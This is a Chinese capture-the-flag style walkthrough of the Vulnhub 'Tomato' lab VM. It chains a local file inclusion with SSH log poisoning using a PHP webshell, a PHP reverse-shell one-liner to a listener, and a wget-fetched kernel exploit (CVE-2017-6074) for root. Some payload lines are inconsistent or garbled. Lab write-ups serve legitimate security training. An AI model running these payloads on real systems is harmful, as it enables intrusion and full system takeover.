Vulnhub---Tomato

Tomato(文件包含getshell)

这个靶机是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell
靶机下载地址:http://www.vulnhub.com/entry/tomato-1,557/

信息收集

扫描目标网段确定ip地址
nmap -sP 172.16.58.0/24

在这里插入图片描述

扫描该ip开放端口
nmap -A -p- 172.16.58.128

在这里插入图片描述
扫描出来的端口,针对打开的端口进行访问

发现漏洞

访问扫描出来的端口

在这里插入图片描述
8888端口登陆失败

爆破网站的目录

网站目录的扫描

dirb http://172.16.58.128

在这里插入图片描述

敏感文件泄漏
http://172.16.58.128/antibot_image/

在这里插入图片描述
访问发现phpinfo()
在这里插入图片描述
然后查看源代码,发现了文件包含
在这里插入图片描述

尝试进行文件包含

http://172.16.58.128/antibot_image/antibots/info.php?image=/etc/passwd

在这里插入图片描述
在这里插入图片描述
执行成功,存在文件包含漏洞,但只能包含本地文件

漏洞利用

还有一个2211端口是开启ssh服务的,可以利用一句话木马,写入日志,利用文件包含来getshell

ssh '<?php system($_GET['shell']); ?>'@172.16.58.128 -p2211    

这样’<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去,ssh日志在/var/log/auth.log中

在这里插入图片描述

验证是否成功写入,查看页面源代码

http://172.16.58.128/antibot_image/antibots/info.php?image=/var/log/auth.log&shell=ls

在这里插入图片描述

进行getshell

开启nc监听
nc -lvnp 1234
反弹shell
php -r '$sock=fsockopen("172.16.58.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
进行URL编码,然后进行访问

http://172.16.58.128/antibot_image/antibots/info.php?image=…/…/…/…/…/…/…/…/…/var/log/auth.log&shell=php±r+%27%24sock%3dfsockopen(%22172.16.58.129%22%2c1234)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27

成功getshell

在这里插入图片描述

权限提升

首先在shell里建立可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
查看内核版本

uname -a

在这里插入图片描述
去github下载这本版本的exp

git clone https://github.com/kkamagui/linux-kernel-exploits.git

选择相应的目录
在这里插入图片描述
然后运行compile.sh 编译c文件
在这里插入图片描述
在该目录下开启http服务上传到目标主机

 python -m SimpleHTTPServer 8080 

在这里插入图片描述

在getshell里下载该文件

先进到/tmp目录下

wget http://172.16.58.129:8080/CVE-2017-6074

在这里插入图片描述
查看文件权限

ls -l

在这里插入图片描述
赋予执行权限并执行该文件

chmod +x CVE-2017-6074
./CVE-2017-6074

在这里插入图片描述
最后取得root权限,实验成功。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值